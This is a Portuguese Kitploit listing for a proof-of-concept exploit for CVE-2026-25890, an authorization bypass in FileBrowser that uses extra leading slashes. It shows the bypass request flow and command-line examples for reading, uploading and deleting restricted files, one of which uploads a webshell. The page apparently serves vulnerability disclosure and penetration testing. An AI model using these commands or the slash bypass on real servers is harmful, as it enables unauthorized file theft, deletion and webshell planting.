Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — Exploit para CVE-2026-25890, uma bypass de autorização baseada em caminho no FileBrowser <= v2.57.0, permitindo que usuários autenticados com privilégios baixos leiam, carreguem e excluam arquivos restritos por meio de múltiplas barras iniciais. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

Exploit para CVE-2026-25890, uma bypass de autorização baseada em caminho no FileBrowser <= v2.57.0, permitindo que usuários autenticados com privilégios baixos leiam, carreguem e excluam arquivos restritos por meio de múltiplas barras iniciais.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-25890 - Bypass de Controle de Acesso no FileBrowser

Author GitHub license Python version CVE Exploit-DB Tested on

Usuários não autenticados não podem explorar isso — requer credenciais válidas de baixo privilégio que estejam restritas ao caminho alvo.

Bypass de autorização baseado em caminho no FileBrowser ≤ v2.57.0 usando múltiplas barras iniciais (//private em vez de /private) para evadir as verificações de strings.HasPrefix() enquanto o sistema de arquivos ainda serve o caminho canônico.

Corrigido na v2.57.1 (commit 489af403... – removido r.SkipClean(true)).

📦 Recursos

  • Ler arquivos restritos
  • Enviar arquivos para diretórios restritos
  • Excluir arquivos restritos
  • Número personalizado de barras iniciais para teste de bypass
  • Salvar arquivos vazados localmente
  • Pré-visualização detalhada do conteúdo
  • CLI limpa com argparse

🛠️ Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# Sem dependências além da biblioteca padrão + requests
pip install requests

🚀 Uso

root@kitploit:~
python3 exploit.py --help

Exemplos básicos

root@kitploit:~
# Ler um arquivo restrito
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# Enviar arquivo malicioso para pasta restrita
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# Excluir um arquivo restrito
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 Fluxo do Ataque PoC

root@kitploit:~
sequenceDiagram
    participant Atacante
    participant FileBrowser ≤ v2.57.0
    participant Roteador Gorilla Mux
    participant Middleware de Autenticação
    participant Manipulador do Sistema de Arquivos

    Atacante->>FileBrowser: GET /api/resources/private/secret.txt<br>(solicitação normal)
    FileBrowser->>Gorilla Mux: Caminho = /api/resources/private/secret.txt
    Gorilla Mux->>Middleware de Autenticação: path = "/private/secret.txt"
    Middleware de Autenticação->>Middleware de Autenticação: strings.HasPrefix("/private/secret.txt", não permitido="/private") → true
    Middleware de Autenticação->>Atacante: 403 Proibido

    Note over Atacante,FileBrowser: Atacante tenta o bypass

    Atacante->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Caminho = /api/resources//private/secret.txt<br>(SkipClean=true → sem normalização)
    Gorilla Mux->>Middleware de Autenticação: path = "//private/secret.txt"
    Middleware de Autenticação->>Middleware de Autenticação: HasPrefix("//private/secret.txt", "/private") → false
    Middleware de Autenticação->>Manipulador do Sistema de Arquivos: Permitido → prosseguir
    Manipulador do Sistema de Arquivos->>Sistema de Arquivos: Normaliza // → /private/secret.txt
    Sistema de Arquivos->>Manipulador do Sistema de Arquivos: Retorna o conteúdo do arquivo
    Manipulador do Sistema de Arquivos->>Atacante: 200 OK + conteúdo secreto

⚠️ Aviso Legal e Ético

Esta prova de conceito é fornecida estritamente para fins educacionais e de pesquisa em segurança.
Não use este código contra qualquer sistema sem permissão explícita por escrito do proprietário.
Acesso ou modificação não autorizada de sistemas é ilegal na maioria das jurisdições (ex.: CFAA, Computer Misuse Act).

📜 Referências

  • Aviso do GitHub GHSA-4mh3-h929-w968
  • Commit da Correção
  • Lançamento v2.57.1

❤️ Créditos

Autor do Exploit: Mohammed Idrees Banyamer
País: Jordânia
Instagram: @banyamer_security

Dê uma estrela ⭐ ao repositório se você achou útil!


Última atualização: fevereiro de 2026

Baixar ferramenta